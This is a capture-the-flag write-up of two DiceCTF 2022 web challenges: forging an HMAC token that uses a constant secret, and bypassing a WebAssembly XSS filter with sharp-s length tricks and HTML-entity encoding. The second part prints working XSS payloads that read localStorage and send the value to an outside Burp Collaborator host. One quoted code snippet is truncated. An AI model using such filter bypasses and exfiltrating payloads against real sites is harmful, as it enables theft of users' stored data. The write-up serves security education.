---
title: "DiceCTF 2022"
date: 2022-02-07T14:13:15+01:00
draft: false
categories:
    - CTF
tags:
    - WEB
    - NodeJS
    - XML encoding
    - 
---

Name | Category |  CTF Time
------------|----------|---- 
**DiceCTF 2022**| **Web** |  **https://ctftime.org/event/1541**

# [*] INDEX:

- [KNOCK KNOCK](#knock-knock)
- [BLAZINGFAST](#blazingfast)

## KNOCK-KNOCK

The challenge gives us the following code :

```js
const crypto = require('crypto');

class Database {
  constructor() {
    this.notes = [];
    this.secret = `secret-${crypto.randomUUID}`;
  }

  createNote({ data }) {
    const id = this.notes.length;
    this.notes.push(data);
    return {
      id,
      token: this.generateToken(id),
    };
  }

  getNote({ id, token }) {
    if (token !== this.generateToken(id)) return { error: 'invalid token' };
    if (id >= this.notes.length) return { error: 'note not found' };
    return { data: this.notes[id] };
  }

  generateToken(id) {
    return crypto
      .createHmac('sha256', this.secret)
      .update(id.toString())
      .digest('hex');
  }
}

const db = new Database();
db.createNote({ data: process.env.FLAG });

const express = require('express');
const app = express();

app.use(express.urlencoded({ extended: false }));
app.use(express.static('public'));

app.post('/create', (req, res) => {
  const data = req.body.data ?? 'no data provided.';
  const { id, token } = db.createNote({ data: data.toString() });
  res.redirect(`/note?id=${id}&token=${token}`);
});

app.get('/note', (req, res) => {
  const { id, token } = req.query;
  const note = db.getNote({
    id: parseInt(id ?? '-1'),
    token: (token ?? '').toString(),
  });
  if (note.error) {
    res.send(note.error);
  } else {
    res.send(note.data);
  }
});

app.listen(3000, () => {
  console.log('listening on port 3000');
});
```

Here we can see the class `Database`, to get the flag we have to look at this function :

```js
getNote({ id, token }) {
    if (token !== this.generateToken(id)) return { error: 'invalid token' };
    if (id >= this.notes.length) return { error: 'note not found' };
    return { data: this.notes[id] };
```

So let's see how the token is generate (`generateToken`) :

```js
generateToken(id) {
    return crypto
      .createHmac('sha256', this.secret)
      .update(id.toString())
      .digest('hex');
```

The token is crafted using sha256 against the id, but we can realize that it's using a salt :

```js
this.secret = `secret-${crypto.randomUUID}`;
```

Bingo! It may not be very clear at first glance but this is awfully implemented, instead of generating a randomUUID, here it's including the function as a string, check this out:

```
secret-function randomUUID(options) {
  if (options !== undefined)
    validateObject(options, 'options');
  const {
    disableEntropyCache = false,
  } = options || {};

  validateBoolean(disableEntropyCache, 'options.disableEntropyCache');

  return disableEntropyCache ? getUnbufferedUUID() : getBufferedUUID();
}
```

The function is taken as a string, this means that the salt is a constant, so we can create the token for the 0:

```js
const crypto = require('crypto');
function generateToken(id) {
    return crypto
        .createHmac('sha256', `secret-${crypto.randomUUID}`)
        .update(id.toString())
        .digest('hex');
}
console.log(generateToken(0));

// 7bd881fe5b4dcc6cdafc3e86b4a70e07cfd12b821e09a81b976d451282f6e264
```

Now we just have to grab the flag :

```bash
$ curl 'https://knock-knock.mc.ax/note?id=0&token=7bd881fe5b4dcc6cdafc3e86b4a70e07cfd12b821e09a81b976d451282f6e264'
```

> dice{1_d00r_y0u_d00r_w3_a11_d00r_f0r_1_d00r}

## BlazingFast

This web application is a mocking case converter :

`input` : Hello World
`output` :  HeLlO WoRlDa

This functionality is implemented in WebAssembly (wasm), the input we provide is passed through the wasm function and then turns the output into the innerHTML of the result element . 
```js
document.getElementById('result').innerHTML = mock(str);
```

Let's take a look at the `mock` function written in c :
```c
int length, ptr = 0;
char buf[1000];

void init(int size) {
	length = size;
	ptr = 0;
}
  
char read() {
	return buf[ptr++];
}
 

void write(char c) {
	buf[ptr++] = c;
}

int mock() {
 for (int i = 0; i < length; i ++) {
	 if (i % 2 == 1 && buf[i] >= 65 && buf[i] <= 90) {
		 buf[i] += 32;
	 }  

	 if (buf[i] == '<' || buf[i] == '>' || buf[i] == '&' || buf[i] == '"') {
		return 1;
	 }
 }

 ptr = 0;
 return 0;

}
```

This is kinda similar to a XSS filter, in this case the function is checking if the input contains `<>&"`, and in that case the input will be rejected as we can see here :
```js
 if (blazingfast.mock() == 1) {
	 return 'No XSS for you!';
```

Let's keep taking a look at the code :
```js
function mock(str) {

 blazingfast.init(str.length);

 if (str.
 return mocking;

 }

}

```

We see that our payload must be shorter than 1000 characters. And let's focus on the loop, in this case the loop will stop once it arrives to the null-byte (this is such a bad practice due to the fact that this could lead to html smuggling when we combine it with `toUpperCase()` function). Check this out :

```js
console.log("a".toUpperCase().length);
// 1

console.log("ß".toUpperCase().length);
// 2

console.log("ß".toUpperCase());
// SS
```

So is kinda weird the measure of some characters. We can take advantage of this since we have 2 ways to calculate the length, one poorly implemented and the other well implemented. We can use some special characters (in this case ß) which will be taken as 2 characters in the poorly implemented funcion. On the other hand the `mock()` function written in c, will just go through the original length, so if the malicious payload is placed out of the "real" length, the filter will not be applied.

But we still have a problem here :( :

```
ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß<script>alert(123)</script>
```

```html
<code>
	"SsSsSsSsSsSsSsSsSsSsSsSsSsSsSsSsSsSsSsSsSsSsSsSsSsSsSsSsSsSsSsSSSSSSSSSS"
	<script>ALERT(123)</script>
</code>
```

Oops! :( All our input is now in capital letters, I considered using JSfuck but then I realized that the payload was too long (and it must be shorter than 1000 characters). And then I found this [post](https://techiavellian.com/constructing-an-xss-vector-using-no-letters) . This post shows us a method to create a payload for XSS without letters, for example :

```js
1 // 1
!1 // false
!!1 // true
!1+'' // "false"
(!1+'')[0] // "f"
```

So this means that we can create our payload with numbers, but unfortunately I couldn't get the payload to work. So I ended up encodig the payload using XML : 

```js
ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß<script>&#X61;&#X6C;&#X65;&#X72;&#X74;(1)</script>
```

With this payload the `alert(1)` worked, so let's make the final payload :

```
<img src=x onerror=this.src='https://vqp10gsxoa2ffgk4553pumm21t7kv9.burpcollaborator.net?'+localStorage.getItem('flag');>
```

Now let's `XML` encode it :

```
ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß<img src=x onerror=&#108;&#111;&#99;&#97;&#116;&#105;&#111;&#110;&#46;&#104;&#114;&#101;&#102;&#61;&#39;https://vqp10gsxoa2ffgk4553pumm21t7kv9.burpcollaborator.net?&#39;&#46;&#116;&#111;&#76;&#111;&#119;&#101;&#114;&#67;&#97;&#115;&#101;&#40;&#41;&#43;&#108;&#111;&#99;&#97;&#108;&#83;&#116;&#111;&#114;&#97;&#103;&#101;&#46;&#103;&#101;&#116;&#73;&#116;&#101;&#109;&#40;&#39;flag&#X27;&#46;&#116;&#111;&#76;&#111;&#119;&#101;&#114;&#67;&#97;&#115;&#101;());>
```

And finally url encode :

```
%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%C3%9F%3Cimg%20src%3Dx%20onerror%3D%26%23108%3B%26%23111%3B%26%2399%3B%26%2397%3B%26%23116%3B%26%23105%3B%26%23111%3B%26%23110%3B%26%2346%3B%26%23104%3B%26%23114%3B%26%23101%3B%26%23102%3B%26%2361%3B%26%2339%3Bhttps%3A%2F%2Fvqp10gsxoa2ffgk4553pumm21t7kv9.burpcollaborator.net%3F%26%2339%3B%26%2346%3B%26%23116%3B%26%23111%3B%26%2376%3B%26%23111%3B%26%23119%3B%26%23101%3B%26%23114%3B%26%2367%3B%26%2397%3B%26%23115%3B%26%23101%3B%26%2340%3B%26%2341%3B%26%2343%3B%26%23108%3B%26%23111%3B%26%2399%3B%26%2397%3B%26%23108%3B%26%2383%3B%26%23116%3B%26%23111%3B%26%23114%3B%26%2397%3B%26%23103%3B%26%23101%3B%26%2346%3B%26%23103%3B%26%23101%3B%26%23116%3B%26%2373%3B%26%23116%3B%26%23101%3B%26%23109%3B%26%2340%3B%26%2339%3Bflag%26%23X27%3B%26%2346%3B%26%23116%3B%26%23111%3B%26%2376%3B%26%23111%3B%26%23119%3B%26%23101%3B%26%23114%3B%26%2367%3B%26%2397%3B%26%23115%3B%26%23101%3B%28%29%29%3B%3E
```

And if we check our Burp Collaborator :

> dice{1_dont_know_how_to_write_wasm_pwn_s0rry}

# THANKS FOR READING 😊 !!